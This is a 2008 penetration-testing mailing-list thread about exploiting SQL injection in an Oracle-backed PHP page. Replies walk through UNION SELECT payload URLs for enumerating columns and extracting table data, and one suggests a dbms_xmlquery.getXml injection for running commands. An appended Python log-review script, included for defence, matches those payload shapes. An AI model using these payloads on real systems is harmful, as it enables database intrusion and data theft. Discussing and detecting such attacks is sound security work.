Penetration Testing mailing list archives
Re: Oracle URL SQL Injection issue
From: Cesar <cesarc56 () yahoo com>
Date: Wed, 23 Jan 2008 15:37:01 -0800 (PST)
Hi

I would recommend first trying to get the source code if possible:

http://x.y.z.a/dbs.inc

but I guess it won't work, it should be a secure web server :)

Anyways, depending on the Oracle version you can easily own it, you just need to inject a function and exploit some known SQL injection in Oracle, or depending on permissions you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your favority sql injection exploit here or any command'))

Look at:
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip

Cesar.

--- Clone <c70n3 () yahoo co in> wrote:

Thanks Jeff & everyone. I've moved further after your emails. Really much appreciated. With Jeff's input below I enumerate that there are 2 columns. This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
Now I get following error:

ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01790: expression must have same datatype as corresponding expression in dbs.inc on line 44

Then I tried following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
And get the error

ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-00911: invalid character in dbs.inc on line 44

The functionality of the page is to generate an email page/forum email page. Any idea what's next?

--- jeffrey rivero <jeffr76 () yahoo com> wrote:

Hello all

in your Union start by finding out how many columns there are ie.
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
would give you 3 columns
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
would give you 4 then once you have that get the data types
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
for the first to be a string and so on then you can start to get real data from the tables or
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--
Jeff

Clone wrote:

Hey List

I am pen testing a web app that supplies sql parameters on the URL something like http://x.y.z.a/item.php?Id=90

I did blind sql injection by adding AND 1=1 to confirm the vulnerability. Now when I do http://x.y.z.a/item.php?Id=90' I get

ociparse() [function.ociparse]: OCIParse: ORA-01756: quoted string not properly terminated in item.php on line 312

Then I tried (after confirming presence of usr table name)
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
and I get the error

ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01789: query block has incorrect number of result columns in dbs.inc on line 44

I know one valid user account in the oracle DB. Any idea what's the best strategy to move forward? I'm not getting any further from here so far. Any advice / help would be much appreciated.

Cheers
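Added example, not part of the original thread: a log-review sketch for the defender side of this exchange. Since Id is a numeric key (Id=90), any value that is not a plain integer is flagged; the request lines are constructed from the URL shapes quoted above, and the function and tag names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines, modelled on the URL shapes quoted in the thread.
SAMPLE_REQUESTS = [
    "GET /item.php?Id=90 HTTP/1.1",
    "GET /item.php?Id=90' HTTP/1.1",
    "GET /item.php?Id=90%20AND%201=1 HTTP/1.1",
    "GET /item.php?Id=90%20union%20select%201,1%20from%20usr HTTP/1.1",
    "GET /item.php?Id=length(dbms_xmlquery.getXml('x')) HTTP/1.1",
]

# Allowlist: the only legitimate shape for Id is a short run of digits.
NUMERIC_ID = re.compile(r"\d{1,10}")

# Tags explaining why a non-numeric value looks like an injection attempt.
INDICATORS = [
    ("quote", re.compile(r"'")),
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("function-call", re.compile(r"\b\w+\s*\(")),
]


def classify(request_line, param="Id"):
    """Return [] when Id is a plain integer, otherwise a list of indicator tags."""
    target = request_line.split()[1]          # "METHOD target HTTP/x.y"
    query = urlsplit(target).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])  # URL-decoded
    tags = []
    for value in values:
        if NUMERIC_ID.fullmatch(value):
            continue                          # expected traffic
        hits = [name for name, rx in INDICATORS if rx.search(value)]
        tags.extend(hits or ["non-numeric"])  # unknown shape is still a finding
    return tags


def review(lines):
    """Map each suspicious request line to its tags; clean lines are omitted."""
    findings = {}
    for line in lines:
        tags = classify(line)
        if tags:
            findings[line] = tags
    return findings


if __name__ == "__main__":
    for line, tags in review(SAMPLE_REQUESTS).items():
        print(", ".join(tags), "<-", line)
```

The same integer allowlist belongs in the application itself, together with binding Id as a number (oci_bind_by_name in PHP's OCI8) and keeping ORA- errors out of the HTTP response.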
Current thread:
- Oracle URL SQL Injection issue Clone (Jan 18)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Cesar (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Jason Thompson (Jan 22)
- Re: Oracle URL SQL Injection issue Francois Larouche (Jan 22)
- Re: Oracle URL SQL Injection issue Danux (Jan 22)
- RE: Oracle URL SQL Injection issue Thakrar, Saurabh (Jan 22)
- Re: Oracle URL SQL Injection issue David Howe (Jan 23)
- Re: Oracle URL SQL Injection issue Joe Yong (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Joxean Koret (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Todd Manning (Jan 22)
- <Possible follow-ups>
- Re: Oracle URL SQL Injection issue Clone (Jan 23)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)